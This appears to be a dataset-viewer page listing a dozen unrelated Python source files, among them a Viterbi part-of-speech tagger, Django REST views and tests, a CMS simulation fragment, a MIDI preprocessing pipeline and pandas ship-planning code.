if prop.proptype in [SqlType.VARCHAR, SqlType.TEXT]:
out += self.col_param_length(prop, func_ref)
for i, prop in enumerate(memb):
out += self.col_param_from_prop(i, prop, self.name)
return out
def get_insert_assertions(self):
"""
Generates basic assertions for 'INSERT' query.
"""
out = "/* Generated using get_insert_assertions() */\n"
for prop in self.members:
if prop.proptype == SqlType.PK_LONG:
if self.get_pk() is not None:
out += "assert({name}T->{pk_name} == 0);\n".format(name=self.name, pk_name=self.get_pk().name)
elif prop.proptype == SqlType.VARCHAR:
out += "assert(strnlen({name}T->{prop_name}, STRING_SIZE) > 1);\n".format(name=self.name,
prop_name=prop.name)
return out
def get_free_members(self):
out = "/* Generated by get_free_members() */\n"
out += "assert(ptr != NULL);\n"
out += "\n"
out += "if (*ptr != NULL){\n"
for prop in self.members:
if prop.proptype == SqlType.FK_LONG:
out += "{name}_free(&((*ptr)->{name}));\n".format(name=prop.name.replace("_id", "").replace("id_", ""))
out += "free(*ptr);\n"
out += "}"
return out
def get_params(self):
return [prop for prop in self.members[1:]]
def get_pk(self):
for mem in self.members:
if mem.proptype == SqlType.PK_LONG:
return mem
return None
|
import FWCore.ParameterSet.Config as cms
def customise(process):
# fragment allowing to simulate neutron background in muon system
# using HP neutron package and thermal neutron scattering
from SimG4Core.Application.NeutronBGforMuons_cff import neutronBG
process = neutronBG(process)
if hasattr(process,'g4SimHits'):
process.g4SimHits.Physics.type = cms.string('SimG4Core/Physics/FTFP_BERT_HP_EML')
process.g4SimHits.Physics.ThermalNeutrons = cms.untracked.bool(True)
return(process)
|
"""The smart list name."""
from jupiter.core.domain.entity_name import EntityName
class SmartListName(EntityName):
"""The smart list name."""
|
from nltk.corpus import brown
from multiprocessing import Pool
import string
import nltk
from nltk.tokenize import RegexpTokenizer
from nltk.corpus import stopwords
import re
# Get brown data
rawData = brown.tagged_sents()
# Lower case, stopword removal, trim sentences
def preprocess(rawSentence):
sentence = []
index = 0
for word, tag in rawSentence:
if index >= 20:
break
index+=1
word = word.lower()
tokenizer = RegexpTokenizer(r'\w+')
tokens = tokenizer.tokenize(word)
filtered_words = [w for w in tokens if not w in stopwords.words('english')]
if (''.join(filtered_words)) != '':
sentence.append((''.join(filtered_words), tag))
return sentence
data = []
for rawSentence in rawData:
sentence = preprocess(rawSentence)
if len(sentence) > 2:
data.append(preprocess(rawSentence))
# Create tag set
count_tags = {}
for sent in data:
for word, tag in sent:
count_tags[tag] = count_tags.setdefault(tag, 0) + 1
tags = set()
for tag, count in count_tags.items():
if count >500:
tags.add(tag)
tags.add('NA')
# Change tags with less numbers to NA
totalWords = 0
for sent in data:
for i, (word, tag) in enumerate(sent):
totalWords+=1
if tag not in tags:
sent[i] = (word, 'NA')
trainData = data[0: int(0.80*len(data))]
testData = data[int(0.80*len(data)): len(data)]
print "data ready after preprocessing"
print "Train set size (#sentences): ", len(trainData), " Test set size: ", len(testData)
#Viterbi Algorithm
##Get counts for calculation of probabilities from train data.
counts = {}
# We need 3 counts:
# - count of (word, tag)
# - count of (tag1)
# - count of (tag1, tag2)
# - count of (tag1, tag2, tag3)
for sent in trainData:
sent = [('', 'START'),('', 'START')] + sent + [('', 'STOP')]
for index, tagged_word in enumerate(sent):
counts[tagged_word] = counts.setdefault(tagged_word, 0) + 1
counts[tagged_word[1]] = counts.setdefault(tagged_word[1], 0) + 1
try :
if index - 1 >= 0:
prev = sent[index - 1]
counts[(prev[1], sent[index][1])] = counts.setdefault((prev[1], sent[index][1]), 0) + 1
try:
if index-2 >= 0:
prevPrev = sent[index - 2]
counts[(prevPrev[1], prev[1], sent[index][1])] = counts.setdefault((prevPrev[1], prev[1], sent[index][1]), 0) + 1
except:
pass
except:
pass
print "training done: calculated counts on train set"
def getProb(v, z, u=None):
#print "in getProb: {0}, {1}, {2} ".format(v, z, u)
alpha1, alpha2, alpha3 = 0.5, 0.3, 0.2
assert(alpha1 + alpha2 + alpha3 == 1)
if u==None:
assert(counts[z]!=0)
return (counts.setdefault((v,z), 1)*1.0)/counts[z]
else:
den1 = counts.setdefault((z,u), 0)
if den1 == 0:
p1 = 0
else:
p1 = (counts.setdefault((z,u,v),0)*1.0)/den1
p2 = (counts.setdefault((u,v), 0)*1.0)/counts[u]
p3 = (counts[v]*1.0)/totalWords
return alpha1*p1 + alpha2*p2 + alpha3*p3
def multiRunWrapper(args):
return calcPi(*args)
def calcPi(k, u, v, tagged_word):
lst = []
Y[k-2] = getTagSet(k-2)
for z in Y[k-2]:
lst.append(((k,u,v), z, prevPi[(k-1, z, u)]*getProb(v, z, u)*getProb(tagged_word[0], v)))
return max(lst, key = lambda item:item[2])
def getTagSet(k):
if k<1:
return ['START']
else:
return tags
numWords = 0
totalCorrects = 0
for sent in testData:
pi = {(0,'START', 'START'):1}
bPtr = {}
for k, tagged_word in enumerate(sent):
prevPi = pi
pi = {}
k += 1
print '>>>>>>>>', k, tagged_word
Y = {}
Y[k-1] = getTagSet(k-1)
Y[k] = getTagSet(k)
# Multiprocess code
#p = Pool(4)
#res = p.map(multiRunWrapper, [(k,u,v,tagged_word) for u in Y[k-1] for v in Y[k]])
#for item in res:
# bPtr[item[0]] = item[1]
# pi[item[0]] = item[2]
# Simple code
for u in Y[k-1]:
for v in Y[k]:
temp = calcPi(k, u, v, tagged_word)
bPtr[(k,u,v)] = temp[1]
pi[(k,u,v)] = temp[2]
predTags = []
lst = []
for u in Y[k-1]:
for v in Y[k]:
lst.append(((u,v),pi[(k,u,v)]*getProb('STOP', u, v)))
temp = max(lst, key=lambda item:item[1])[0]
predTags = [temp[0], temp[1]]
for k in range(k-2, 0, -1) :
predTags = [bPtr[(k+2, predTags[0], predTags[1])]] + predTags
correct = 0
for index, tagged_word in enumerate(sent):
if tagged_word[1] == predTags[index]:
correct+=1
print predTags
print "accuracy = ", correct*1.0/len(sent)
numWords+=len(sent)
totalCorrects+=correct
print "Overall accuracy uptill now= ", totalCorrects*1.0/numWords
#sent = [(u'doubt', u'NN') ,
# (u'mrs', u'NP') ,
# (u'meeker', u'NP') ,
# (u'snubbed', u'VBN') ,
# (u'many', 'NA') ,
# (u'time', u'NN') ,
# (u'felt', u'VBD') ,
# (u'grief', u'NN') ,
# (u'passing', u'NN')
# ]
#
#pi = {(0,'START', 'START'):1}
#bPtr = {}
#tempPi = []
#for k, tagged_word in enumerate(sent):
# tempPi.append(pi)
# prevPi = pi
# pi = {}
# k += 1
#
# print '>>>>>>>>', k, tagged_word
# Y = {}
# Y[k-1] = getTagSet(k-1)
# Y[k] = getTagSet(k)
# # Multiprocess code
# #p = Pool(4)
# #res = p.map(multiRunWrapper, [(k,u,v,tagged_word) for u in Y[k-1] for v in Y[k]])
# #for item in res:
# # bPtr[item[0]] = item[1]
# # pi[item[0]] = item[2]
# # Simple code
# for u in Y[k-1]:
# for v in Y[k]:
# temp = calcPi(k, u, v, tagged_word)
# bPtr[(k,u,v)] = temp[1]
# pi[(k,u,v)] = temp[2]
#predTags = []
#lst = []
#for u in Y[k-1]:
# for v in Y[k]:
# lst.append(((u,v),pi[(k,u,v)]*getProb('STOP', u, v)))
#temp = max(lst, key=lambda item:item[1])[0]
#predTags = [temp[0], temp[1]]
#for k in range(k-2, 0, -1) :
# predTags = [bPtr[(k+2, predTags[0], predTags[1])]] + predTags
#correct = 0
#for index, tagged_word in enumerate(sent):
# if tagged_word[1] == predTags[index]:
# correct+=1
#print predTags
#print "accuracy = ", correct*1.0/len(sent)
#numWords+=len(sent)
#totalCorrects+=correct
#print "Overall accuracy uptill now= ", totalCorrects*1.0/numWords
|
# 5. Assert a test case true if the input falls under the range[-5,5]
def assert_test(num):
assert -5 <= num <= 5
#test
assert_test(4)
assert_test(6) |
import os
from google.cloud import storage
from django.test import TestCase
from django.conf import settings
from .storage_service import FileStorageService
class FileStorageTests(TestCase):
@classmethod
def setUpTestData(cls):
storage_client = storage.Client()
cls.bucket = storage_client.get_bucket('csre-utilities.appspot.com')
def test_storage_service_creates_blob(self):
storage_service = FileStorageService()
intx = storage_service.get_or_create_blob('test')
self.assertIsNotNone(intx)
self.assertTrue(isinstance(intx, storage.Blob))
def test_storage_service_saves_csv(self):
storage_service = FileStorageService()
upload_name = 'inspfile.csv'
path = os.path.join(settings.MOCK_FILE_LOCATION, upload_name)
with open(path, 'rb') as file:
file_bytes = file.read()
file_blob = storage_service.store_file(file_bytes, upload_name, 'intx')
self.assertTrue(file_blob.exists())
self.assertTrue(isinstance(file_blob, storage.Blob))
def test_storage_service_saves_txt(self):
storage_service = FileStorageService()
upload_name = 'apprfile-mock.txt'
path = os.path.join(settings.MOCK_FILE_LOCATION, upload_name)
with open(path, 'rb') as file:
file_bytes = file.read()
file_blob = storage_service.store_file(file_bytes, upload_name, 'aptx')
self.assertTrue(file_blob.exists())
self.assertTrue(isinstance(file_blob, storage.Blob))
def test_storage_service_saves_xlsx(self):
storage_service = FileStorageService()
upload_name = 'okce-mock.xlsx'
path = os.path.join(settings.MOCK_FILE_LOCATION, upload_name)
with open(path, 'rb') as file:
file_bytes = file.read()
file_blob = storage_service.store_file(file_bytes, upload_name, 'reok')
self.assertTrue(file_blob.exists())
self.assertTrue(isinstance(file_blob, storage.Blob))
def test_gets_reader(self):
storage_service = FileStorageService()
stream_reader = storage_service.stream_reader('intx')
self.assertIsNotNone(stream_reader)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 17 14:55:53 2017
@author: Administrator
"""
from gensim import corpora, models, similarities
import matplotlib.pyplot as plt
import numpy as np
import os
filelist=os.listdir('C:\\Users\\Administrator\\Desktop\\original_lda\\rawdata');
for item in filelist:
iitem='C:\\Users\\Administrator\\Desktop\\original_lda\\rawdata\\'+item;
newfile=open('C:\\Users\\Administrator\\Desktop\\original_lda\\rawdata1\\'+item,'a');
src=open(iitem,'r');
string5='';
for line in src:
if(line.strip()!=''):
line=line.strip('\n');
data=line.strip();
string=str(data);
string0=string.replace('\n',' ');
string1=string0.replace('[','');
string2=string1.replace(']','');
string3=string2.replace(',',' ');
string4=string3.replace('nbsp/n','');
string5=string5+' '+string4;
# string5=string5.decode('gbk');
# string5=string5.encode('utf-8');
newfile.write(string5);
newfile.write('\n');
newfile.close();
filelist = os.listdir('C:\\Users\\Administrator\\Desktop\\original_lda\\rawdata1')
newfile = open('C:\\Users\\Administrator\\Desktop\\original_lda\\ddata.txt','a')
for item in filelist:
iitem = 'C:\\Users\\Administrator\\Desktop\\original_lda\\rawdata1\\' + item
for txt in open(iitem,'r'):
newfile.write(txt)
newfile.close()
|
from crawler import download_all, download_srt_file, download_improve
url = 'http://www.xuetangx.com/courses/course-v1:TsinghuaX+20220332X+2018_T2/courseware/a1039c2138944208a18a83d3c14dd799/f33a4efe2738403ba73cccd510fafb38/'
if __name__ == '__main__':
download_improve(url)
# download_srt_file(url)
|
from django.shortcuts import render
from rest_framework.decorators import api_view
from .serializer import MovieSerializer
from .models import Movie
from rest_framework.response import Response
# Create your views here.
@api_view(['GET'])
def apiOverview(request):
api_urls = {
'List':'/get-movie/',
'Create':'/post-movie/',
'Update' : '/update-movie/'
}
return Response(api_urls)
@api_view(['GET'])
def AllMovie(request):
movie = Movie.objects.all()
serializer = MovieSerializer(movie, many=True)
return Response(serializer.data)
@api_view(['GET'])
def GetMovie(request,pk):
movie = Movie.objects.get(id=pk)
serializer = MovieSerializer(instance=movie)
return Response(serializer.data)
@api_view(['PUT'])
def PostMovie(request):
serializer = MovieSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
@api_view(['PUT'])
def UpdateMovie(request, pk):
movie = Movie.objects.get(id=pk)
print(movie)
serializer = MovieSerializer(instance=movie, data=request.data)
if serializer.is_valid():
print('SAVING')
serializer.save()
else:
print('NO SAVING')
return Response(serializer.data)
@api_view(['DELETE'])
def DeleteMovie(render,pk):
movie = Movie.objects.get(id=pk)
movie.delete()
return Response('Movie Deleted') |
import os, time, datetime
from preprocess import PreprocessingPipeline
from random import shuffle
sampling_rate = 125
n_velocity_bins = 32
seq_length = 1024
n_tokens = 256 + sampling_rate + n_velocity_bins
def main():
pipeline = PreprocessingPipeline(input_dir="data", stretch_factors=[0.975, 1, 1.025],
split_size=30, sampling_rate=sampling_rate, n_velocity_bins=n_velocity_bins,
transpositions=range(-2,3), training_val_split=0.9, max_encoded_length=seq_length+1,
min_encoded_length=257)
pipeline_start = time.time()
pipeline.run()
runtime = time.time() - pipeline_start
print(f"MIDI pipeline runtime: {runtime / 60 : .1f}m")
print(pipeline.encoded_sequences)
exit()
if __name__=="__main__":
main()
|
########################
# Constants declaration
########################
# YOU SHOULD MODIFY THIS FILE
# USE 'constants_perso' to declare your modifications
# the tag for replacement
tag = '€'
# 1. list of LaTeX environnment whose content will be discard
# Ex. \begin{equation} ... \end{equation} will be replace by a tag
# Ex. \begin{itemize} ... \end{itemize} is not there and the content will be kept
list_env_discard = ['equation',
'equation*',
'align',
'align*',
'lstlisting'
]
# Add you personnal environnment in 'constants_perso.py'
# 2. list of LaTeX command with argument who will be totally will be discard
# Ex. \usepackage[option]{class} will be replace by a tag
# Ex. \emph{my text} is not there and the content will be kept
list_cmd_arg_discard = ['usepackage',
'documentclass',
'begin',
'end',
'includegraphics',
'label',
'ref',
'cite'
]
# Add you personnal commands in 'constants_perso.py'
|
import pandas as pd
def planning(df):
df['loadDate'] = df['loadDate'].str[:10]
df['dayofweek'] = list(df['loadDate'].map(str) + " "
+ pd.to_datetime(df['loadDate'], format='%Y-%m-%d').dt.day_name())
new = list(df['loadlocation'].map(str) + " " + df['loadingReference'].map(str) + " " + df['weight'].map(str) +
"mt" +" " + df['volume'].map(str) + "m3" + " " +df['product'].map(str) + "-" +
df['dischargeLocation'].map(str) + " " + df['loadingReference'].map(str) + "(" +
df['supplier'].map(str) + ")")
df['new'] = new
df = df.drop_duplicates(subset=["ship", "dayofweek"])
planning_result = df.pivot(index='ship', columns='dayofweek')['new']
return planning_result
def status(df):
status = df[['ship', 'operator', 'current_location', 'current_status', 'eta', 'ata']]
status['eta'] = status['eta'].str.replace("T"," ").str[:16]
status['ata'] = status['ata'].str.replace("T"," ").str[:16]
status = status.drop_duplicates()
status['status'] = list(status['current_location'].map(str) + " " + status['current_status'].map(str) + " ETA: "
+ status['eta'].map(str) + " ATA: "
+ status['ata'].map(str))
status_result = status[['ship', 'operator', 'status']]
return status_result
def sylvanator(csv_file):
df = pd.read_csv(csv_file)
plan = planning(df)
state = status(df)
sylvanator = plan.merge(state, how='left', left_on='ship', right_on="ship")
sylvanator = sylvanator[
[sylvanator.columns[0], sylvanator.columns[-2], sylvanator.columns[-1], sylvanator.columns[1], sylvanator.columns[2],
sylvanator.columns[3], sylvanator.columns[4], sylvanator.columns[5]]]
return sylvanator
|
# Generated by Django 4.0.1 on 2022-03-02 08:20
from django.db import migrations
def UpdateJobStatus(apps, schema_editor):
"""A bug resulted in the human readable choices values for Job.status being saved in the
database. This migration updates all existing job records to ensure that the correct
values are present.
"""
Job = apps.get_model("main", "Job")
mapping = {"Completed": "C", "Queueing": "Q", "Running": "R"}
for job in Job.objects.all():
try:
job.status = mapping[job.status]
except KeyError:
pass
job.save()
class Migration(migrations.Migration):
dependencies = [
("main", "0013_auto_20210810_2154"),
]
operations = [migrations.RunPython(UpdateJobStatus)]
|
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
from pathlib import Path
import json
from request_appi import AppiResponseMonitor
class MonitorVentas(PatternMatchingEventHandler, Observer):
def __init__(self, path='.', patterns='*', logfunc=print):
PatternMatchingEventHandler.__init__(self, patterns)
Observer.__init__(self)
self.schedule(self, path=path, recursive=False)
self.log = logfunc
def on_created(self, event):
# This function is called when a file is created
path = Path(event.src_path)
if path.suffix == ".txt":
self.log(f"{path.name} ¡Agregado!")
# self.load_json(path)
response_api = AppiResponseMonitor(path).send()
print(response_api)
# def load_json(self, ruta):
# f = open(ruta, "r")
# content = f.read()
# jsondecoded = json.loads(content)
# for key, value in jsondecoded.items():
# print(f"{key}: {value}")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.